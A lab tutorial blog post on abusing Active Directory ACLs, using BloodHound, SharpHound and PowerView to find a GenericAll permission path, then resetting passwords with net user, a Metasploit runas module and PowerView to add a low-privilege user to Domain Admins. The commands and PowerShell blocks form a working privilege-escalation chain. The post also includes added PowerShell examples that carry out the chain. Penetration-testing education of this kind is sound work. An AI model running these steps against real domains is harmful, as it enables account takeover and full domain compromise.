Enumerating & Exploiting ACL in Active Directory

Lateral Movement inside Active Directory using BloodHound and SharpHound

Posted by Utkarsh Agrawal on October 09, 2020 · 7 mins read

Hi All,

BloodHound is a great tool for mapping out the objects in Active Directory and the relationships between them. It imports the JSON files produced by its collector, loads them into a Neo4j graph database and draws graphs of how users, groups, computers and ACLs connect. We will see this in detail below.

SharpHound is the data collector for BloodHound: it enumerates the objects in the domain and writes the results to JSON files that BloodHound then imports.

We are assuming that we already have a shell on a domain-joined machine; the domain is named 'adlab.local'.

I have also used PowerView, another GREAT tool for enumerating objects in AD.

Before we proceed further, we need to understand the users that were created for the demonstration.

Victim: The target user we already have access to. This means we have a shell on a system as this user.
Victim2: Another user with slightly higher privileges than Victim.
Vulnerablegroup: A group that contains Victim2 as a member.
Suser (Super User): A member of the Domain Admins group.

BloodHound Introduction

After running SharpHound, import every JSON file it returned into BloodHound. These are the objects of the 'adlab.local' domain graph drawn by BloodHound on which we need to focus.

The groups of most interest are Domain Admins and Administrators. Let's see which users are inside Domain Admins.

As you can see, 'suser' is in the group, so this will be our target; we will make a note of it.

As you know, we have access to the Victim account, which is a domain account, and we have also found another account named 'suser' which is a Domain Administrator. So let's find out, with the help of BloodHound, whether a path through misconfigured permissions exists between the two.

We give VICTIM@ADLAB.LOCAL as the start node and SUSER@ADLAB.LOCAL as the destination node, and check the results.

And yes, we have one. As you can see, the starting node is victim@adlab.local and the ending node is suser@adlab.local (the one that is not displayed).

So we found an attack path.

Let’s understand this

The victim user has GenericAll permission on the Victim2 user. GenericAll is full control over the object, and for a user object it includes the right to reset the password, so we can set a new password on victim2 without knowing the current one. Furthermore, Victim2 is a member of Vulnerablegroup.

Vulnerablegroup has GenericAll permission on the final target, suser@adlab.local. A right granted to a group is held by every member of that group, so victim2 holds it through its membership of Vulnerablegroup. This means that if we can act as victim2 we can change the password of the super user, then act as suser and add our own user, victim, to the Domain Admins group, which is the end goal.
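The edges BloodHound draws come from the ACLs on the objects themselves, and the same data can be pulled straight from the domain with PowerView. The following is an added example, not code from the original post; it assumes PowerView (dev branch) is loaded in a shell running as 'victim' in adlab.local, and uses the object names from this lab:

```powershell
# Added example, not from the original post. Assumes PowerView (dev branch) is already
# loaded and we are running as 'victim' on adlab.local; object names match the lab above.

# Step 1: list every non-default ACE in the domain that grants a dangerous right, then
# keep only the rows where the principal is one of the nodes on BloodHound's path.
# These rows are the data behind the two GenericAll edges in the graph.
$edges = Find-InterestingDomainAcl -ResolveGUIDs |
    Where-Object { $_.IdentityReferenceName -match '^(victim|victim2|vulnerablegroup)$' } |
    Select-Object IdentityReferenceName, ActiveDirectoryRights, ObjectDN

$edges | Format-Table -AutoSize

# Step 2: confirm the group link in the middle of the path (victim2 -> vulnerablegroup).
Get-DomainGroupMember -Identity vulnerablegroup |
    Select-Object GroupName, MemberName, MemberObjectClass

# Step 3: look at the target user's ACL directly and resolve the SIDs so the rows are
# readable. Any of these rights on a user object lets the holder take the account over
# (GenericAll and ForceChangePassword via a password reset, WriteDacl/WriteOwner by first
# granting themselves GenericAll).
Get-DomainObjectAcl -Identity suser -ResolveGUIDs |
    Where-Object { $_.ActiveDirectoryRights -match 'GenericAll|GenericWrite|WriteDacl|WriteOwner|ForceChangePassword' } |
    Select-Object @{ n = 'Principal'; e = { ConvertFrom-SID ([string]$_.SecurityIdentifier) } },
                  ActiveDirectoryRights, ObjectDN
```

If Step 1 returns no row for 'victim' but Step 3 still shows Vulnerablegroup on suser, re-check the first edge with `Get-DomainObjectAcl -Identity victim2 -ResolveGUIDs`; Find-InterestingDomainAcl filters out some ACEs (for example those held by built-in SIDs), so it is a quick triage, not the complete ACL.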

Make sense? Alright, let’s see how we can do it.

Exploit Part

Right now we are the victim user, which is only in the Domain Users group (a low-privileged user).

As we know, we can change victim2's password thanks to the GenericAll permission, so let's change it.

CMD:- net user victim2 hacked123!@# /DOMAIN

We have changed the password, but now the challenging part comes:

How can we impersonate victim2? In other words, how can we use those credentials to become victim2?

Here is my opinion:

A: Check for computers reachable over RDP, so that we can use the victim2 credentials there.
B: Check for any open SSH service, but it must be joined to the Active Directory domain, otherwise the credentials won't work in the domain context (let me know if I am wrong here).
C: Try the runas command.

Here I want to know what other good options we have. So if you know better ways to impersonate a domain user with their credentials, please let me know. I really want to know the best way to use the credentials.

Note: PsExec won't work here, because it requires access to the ADMIN$ share on the target (i.e. local admin rights there), which our user doesn't have.
So I picked the runas option, but when I tried to use it I faced another problem.

CMD: runas /user:victim2 cmd

Here you cannot provide the password along with the username; runas asks for it separately, like this:

But I wasn't able to submit the password; it just dropped me back to the directory prompt without letting me type the password. I don't know what the problem was.

So after searching here and there, I found out that Metasploit has a post-exploitation module for runas, so I quickly used it, and...

CMD: run post/windows/manage/run_as_psh user=victim2 pass=hacked123!@# domain=adlab.local

It worked perfectly; now I am the victim2 user. Remember that victim2 was in Vulnerablegroup, and that group has GenericAll permission on SUSER@ADLAB.LOCAL.

Now we can change the password of suser, again without knowing the current password.

CMD: net user suser hacked123!@# /domain


Now impersonate suser in the same way,

And yes!! We have successfully impersonated suser. Guess what now: we will add our victim user to the Domain Admins group, because we are now suser, a Domain Administrator.

CMD: net group "Domain Admins" victim /ADD /DOMAIN

And there we go: we are an administrator of the domain 'adlab.local'.
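The whole chain can also be run without runas or a Metasploit session. runas has no password argument and reads the password directly from the console rather than from standard input, which is why the prompt cannot be answered from a reverse shell. Since every step here is an LDAP write against the DC, it is enough to pass alternate credentials on the network: PowerView's Set-DomainUserPassword and Add-DomainGroupMember both take a -Credential parameter. The following is an added example, not code from the original post; it assumes PowerView (dev branch) is loaded, that we start as 'victim' in adlab.local, and reuses the passwords chosen above:

```powershell
# Added example, not from the original post. Assumes PowerView (dev branch) is loaded and
# that we start as 'victim' on adlab.local. Object names and passwords are the lab's own.
# Caveat: resetting a Domain Admin's password locks the real admin out and is very noisy
# (event 4724, "An attempt was made to reset an account's password", on the DC). On a real
# engagement agree this with the client first.

$newPass = ConvertTo-SecureString 'hacked123!@#' -AsPlainText -Force

# Step 1: victim has GenericAll on victim2 -> reset victim2's password. No old password is
# needed; this is the User-Force-Change-Password right that GenericAll includes.
Set-DomainUserPassword -Identity victim2 -AccountPassword $newPass

# Step 2: use the new credentials over the network instead of impersonating locally.
# Nothing here needs an interactive logon, RDP or SSH.
$victim2Cred = New-Object System.Management.Automation.PSCredential('adlab\victim2', $newPass)

# Vulnerablegroup (which victim2 is a member of) has GenericAll on suser -> reset suser's
# password while authenticating to the DC as victim2.
Set-DomainUserPassword -Identity suser -AccountPassword $newPass -Credential $victim2Cred

# Step 3: suser is a Domain Admin -> as suser, add victim to Domain Admins.
$suserCred = New-Object System.Management.Automation.PSCredential('adlab\suser', $newPass)
Add-DomainGroupMember -Identity 'Domain Admins' -Members victim -Credential $suserCred

# Verify. The membership is read from the DC, so it shows immediately. The token of the
# shell we are sitting in will only carry the new group after a fresh logon, so
# 'whoami /groups' keeps showing the old membership until then.
Get-DomainGroupMember -Identity 'Domain Admins' | Select-Object MemberName
```

If you do need a local process under the new account (for example to run a tool that does not take explicit credentials), `runas /netonly /user:adlab\victim2 cmd` from an interactive desktop session gives a process whose network authentication uses victim2 while the local token stays victim's; it still prompts on the console, so it is an option from RDP, not from a reverse shell.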

Future Work:

My focus will be to create more advanced vulnerable permissions and show how to exploit them. In my opinion, finding the misconfiguration is easy, but exploiting it will be very challenging.

I will continue the series.
Thanks for your time,

Till then, stay safe, stay healthy.

Demo Image